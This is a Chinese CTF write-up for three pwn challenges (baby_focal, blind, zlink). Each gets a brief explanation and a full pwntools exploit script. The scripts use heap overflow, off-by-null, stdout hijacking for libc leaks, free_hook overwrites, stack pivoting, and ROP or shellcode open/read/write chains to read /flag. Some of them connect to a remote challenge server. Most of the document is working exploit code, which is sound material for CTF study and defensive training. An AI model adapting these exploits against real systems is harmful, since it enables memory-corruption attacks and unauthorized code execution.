mt-ctf

baby_focal

堆溢出,沒開pie,沒有show,劫持stdout來(lái)泄露地址,然后劫持?jǐn)?shù)組指針造成任意地址寫原語(yǔ),開了沙盒,版本是2.31,因此劫持free_hook為控制rbp的gadget來(lái)進(jìn)行棧遷移(不知道為什么tls遠(yuǎn)程走不通)
爆破1/16

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
context.log_level = 'debug'

binary = 'baby_focal'
elf = ELF('baby_focal')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  #p = process(["qemu-aarch64","-L","",binary])
  #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
  host = "115.28.187.226"
  port =  32435
  p = remote(host,port)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
sla("name: ","aaaa")
def cmd(idx):
    sla(">> ",str(idx))
def add(idx,size):
    cmd(1)
    sla("index >> ",str(idx))
    sla("size >> ",str(size))
def free(idx):
    cmd(3)
    sla("index >> ",str(idx))
def edit(idx,payload):
    cmd(2)
    sla("index >> ",str(idx))
    sa("content >> ",payload)
for i in range(7):
    add(0,0x68)
    free(0)
add(1,0x4f0)
add(2,0x18)
add(3,0x68)
free(1)
add(1,0x430)
add(4,0x68)
add(0,0x18)
free(4)
free(3)
edit(2,"a"*0x18+p64(0x71)+p8(0xa0)+'\n')
edit(0,"a"*0x18+p64(0x71)+p16(0x265d)+'\n')
add(3,0x68)
free(1)
add(4,0x60)
# gdb.attach(p)
add(1,0x61)
edit(1,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0)+'\n')
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
payload = "\x00"*0x28+p64(0x21)
payload = payload.ljust(0x48,"\x00")
payload += p64(0x71)
edit(4,payload+'\n')
edit(0,"a"*0x18+p64(0xc1)+'\n')
free(3)
payload = "\x00"*0x28+p64(0x21)
payload = payload.ljust(0x48,"\x00")
payload += p64(0x71)
payload += p64(0x404070)
free(0)
edit(4,payload+'\n')
add(3,0x60)
add(0,0x60)
payload = p64(0x404060)+p64(0x1000)
edit(0,payload+'\n')
addr = 0x1f3580+libc_base
gaget = 0x0000000000157d8a+libc_base
setcontext = libc_base+libc.sym["setcontext"]+61
syscall = 0x0000000000066229+libc_base
free_hook1 = libc_base+libc.sym["__free_hook"]
free_hook1 = free_hook1 & 0xfffffffffffff000
pop_rdi = libc_base+0x0000000000026b72
pop_rsi = libc_base+0x0000000000027529
pop2_rdx = libc_base+0x000000000011c371
pop_rax = libc_base+0x000000000004a550
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
frame = str(frame)
payload = p64(addr-0x58)+p64(0x1000)
payload += p64(0x4040b0)+p64(0x1000)
payload += p64(libc_base+libc.sym["__free_hook"])+p64(0x1000)
payload += p64(setcontext<<0x11)+p64(0)+p64(0)+p64(0x4040b0)
edit(2,payload +'\n')
leaver = 0x0000000000401419
pop_rbp = 0x0000000000032b58+libc_base
payload2 = [
    pop_rdi,
    0x404100,
    pop_rsi,
    0,
    pop2_rdx,
    0,
    0,
    pop_rax,
    2,
    syscall,
    pop_rdi,
    3,
    pop_rsi,
    free_hook1+0x200,
    pop2_rdx,
    0x200,
    0x200,
    pop_rax,
    0,
    syscall,
    pop_rdi,
    1,
    pop_rsi,
    free_hook1+0x200,
    pop2_rdx,
    0x100,
    0x100,
    pop_rax,
    1,
    syscall

]
payload = p64(0x4040b0+0x50)+p64(leaver)+p64(0x4040b0+0x50)+p64(0x4040b0-0x8)
payload += p64(leaver)
payload = payload.ljust(0x48,"a")
payload += p64(0x4040b0)
payload += "/flag\x00\x00\x00"
edit(1,payload+flat(payload2)+'\n')
edit(2,p64(gaget)+'\n')
free(1)
p.interactive()
# edit(1,frame+'\n')
# edit(1,"%11$p-%12$p-%13$p"+'\n')
# ru("0x")
# ru("0x")
# canary = int(ru("-")[:-1],16)
# lg("canary",canary)
# gdb.attach(p)
# payload = p64(0x404090)*2
# payload += '\x00'*0x70+p64(canary)+p64(0)
# edit(0,payload+'\n')
# # sc = shellcraft.open("flag")
# # sc += shellcraft.read("rax",free_hook1+0x200,0x100)
# # sc += shellcraft.write(1,free_hook1+0x200,0x100)
# # p.recv()
# # p.send("4")
# # sleep(0.01)
# # p.sendline(flat(payload).ljust(0x100,"a")+"/flag\x00\x00\x00")
blind

格式化字符串加棧溢出,跟進(jìn)exit函數(shù)發(fā)現(xiàn)在dl_fini有一處函數(shù)調(diào)用


call qword ptr[r12+rdx*8] 其中rdx為0,r12首先通過(guò)rax來(lái)賦值然后通過(guò)add r12 qword ptr[rbx]來(lái)取值,可以看到rbx為棧上的值,因此我們可以通過(guò)格式化字符串劫持該地址,因?yàn)閞12被rax賦值之后是bss上面的地址,因此我們只要合理控制好[rbx]就可以直接調(diào)用后門函數(shù)來(lái)?xiàng)R绯?,可以棧溢出之后直接rop往read的got表里面寫,將其劫持為one_gadget即可getshell爆破1/16

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
context.log_level = 'debug'

binary = 'blind'
elf = ELF('blind')
libc = elf.libc
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
  #p = process(["qemu-aarch64","-L","",binary])
  #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
  host = "115.28.187.226"
  port =  12435
  p = remote(host,port)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
payload = "%696c%26$hn\x00".ljust(0x10,"\x00")
payload += p64(0x400913)
# payload = p64(0x400913)
p.recv()
# gdb.attach(p,"b *(0x7ffff7de7df9)")
p.send(payload)
leaver = 0x00000000004008ad 
poprdi = 0x0000000000400a43
poprsi = 0x0000000000400a41
sleep(0.01)
payload = "a"*0x38+p64(poprdi)+p64(0)+p64(poprsi)+p64(elf.got["read"])*2+p64(elf.plt["read"])*2
p.send(payload)
sleep(0.1)
# attach(p)
p.send(p16(0x5247))
# p.shutdown("in")
p.interactive()
zlink

off by null,由于全局變量的限制,本題相當(dāng)于沒有show,遠(yuǎn)程版本是2.23,因此劫持stdout泄露地址,然后由于edit的時(shí)候會(huì)向fre_hook-0x18處寫0x7f因此double free劫持free_hook為setcontext 而后orw一把梭
爆破1/16

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
context.log_level = 'debug'

binary = 'zlink'
elf = ELF('zlink')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  #p = process(["qemu-aarch64","-L","",binary])
  #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
  host = "115.28.187.226"
  port =  22435
  p = remote(host,port)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla(":",str(idx))
def add(size,payload,idx):
    cmd(1)
    sla("Index:",str(idx))
    sla("Heap : ",str(size))
    sa("tent?:",payload)
def free(idx):
    cmd(2)
    sla("Index:",str(idx))
def show(idx):
    cmd(5)
    sla("Index :",str(idx))
def edit(idx,payload):
    cmd(6)
    sla("Index:",str(idx))
    sa("tent?:",payload)
def add2():
    cmd(4)
cmd(4)
add(0x60,"aaa",0)
free(15)
add(0x60,'aaaa',1)
free(14)
add(0x20,"aaa",2)
add(0x60,"aaa",3)
add(0x60,"aaa",4)
add(0x60,"aaa",5)
add(0x70,"aaa",6)
add(0x70,"aaa",7)
add(0x70,"aaa",8)
add(0x70,"aaa",9)
add(0x70,"aaa",10)
add(0x30,"aaa",11)
cmd(4)
free(11)
add(0x38,"a",11)
edit(11,"a"*0x30+p64(0x470))
free(14)
free(6)
free(7) 
free(8)
free(9)
free(10)
add(0x50,"aaa",6)
add(0x60,p16(0x25dd),7)#1
add(0x60,p16(0x25dd),8)#4
add(0x60,p16(0x25dd),9)#5
"""
0x5555557560a0: 0x0000555555757620  0x0000555555757110
0x5555557560b0: 0x0000555555757010  0x0000555555757040
0x5555557560c0: 0x0000555555757180  0x00005555557571f0
0x5555557560d0: 0x00005555557570b0  0x0000555555757110
0x5555557560e0: 0x0000555555757180  0x00005555557571f0
"""
free(1)
free(4)
free(7)
add(0x60,p8(0xe0),1)
add(0x60,p8(0xe0),4)
add(0x60,p8(0xe0),7)
free(6)
add(0x60,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0),6)
free(2)
add(0x60,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88),2)
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
free(1)
free(0)
free(7)
addr = libc_base+libc.sym["setcontext"]
add(0x60,p64(libc_base+libc.sym["__free_hook"]-0x18),1)
add(0x60,p64(libc_base+libc.sym["__free_hook"]-0x18),0)
free_hook = libc.symbols["__free_hook"]+libc_base
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
pop_rdi = 0x0000000000021112 + libc_base
pop_rsi = libc_base + 0x00000000000202f8
pop_rdx = libc_base + 0x0000000000001b92
pop_rax = libc_base + 0x000000000003a738
syscall = libc_base + 0x00000000000bc3f5
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
frame = str(frame)
print len(frame)
add(0x60,frame[:0x60],7)
free(4)
add(0x60,frame[0x70:0xd0],4)
free(7)
add(0x68,frame[:0x60],13)
add(0x60,p64(addr+53)*3,12)
free(13)
payload = [
    pop_rdi,
    free_hook1,
    pop_rsi,
    0x2000,
    pop_rdx,
    0x7,
    pop_rax,
    10,
    syscall,
    free_hook1+0x70
]
sc = shellcraft.open("/flag")
sc += shellcraft.read("rax",free_hook1+0x200,0x100)
sc += shellcraft.write("1",free_hook1+0x200,0x100)
p.sendline(flat(payload).ljust(0x70,'\x90')+asm(sc))
# gdb.attach(p)
# edit(5,p8(0x00))
p.interactive()
# show(1)
# libc_base = l64()-libc.sym["__malloc_hook"]-0x10-88-0x400
# lg("libc_base",libc_base)
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 0x00 前言 Pwn弱雞,比賽劃水,只好跟著大佬的博客刷刷一些題目才能維持尊嚴(yán),在刷題目的時(shí)候又發(fā)現(xiàn)了一些新姿勢(shì)...
    Fish_o0O閱讀 1,654評(píng)論 0 6
  • 學(xué)習(xí)中級(jí)ROP:__libc_csu_init 函數(shù)實(shí)現(xiàn)對(duì)libc的初始化操作,在 libc_csu_init 中...
    小白King閱讀 1,297評(píng)論 0 1
  • zerotask ? 拿到題目首先運(yùn)行下,IDA打開分析main函數(shù),可以看到有創(chuàng)建進(jìn)程和刪除進(jìn)程的操作,一般...
    Nevv閱讀 1,170評(píng)論 0 1
  • 表情是什么,我認(rèn)為表情就是表現(xiàn)出來(lái)的情緒。表情可以傳達(dá)很多信息。高興了當(dāng)然就笑了,難過(guò)就哭了。兩者是相互影響密不可...
    Persistenc_6aea閱讀 129,959評(píng)論 2 7
  • 16宿命:用概率思維提高你的勝算 以前的我是風(fēng)險(xiǎn)厭惡者,不喜歡去冒險(xiǎn),但是人生放棄了冒險(xiǎn),也就放棄了無(wú)數(shù)的可能。 ...
    yichen大刀閱讀 8,247評(píng)論 0 4

友情鏈接更多精彩內(nèi)容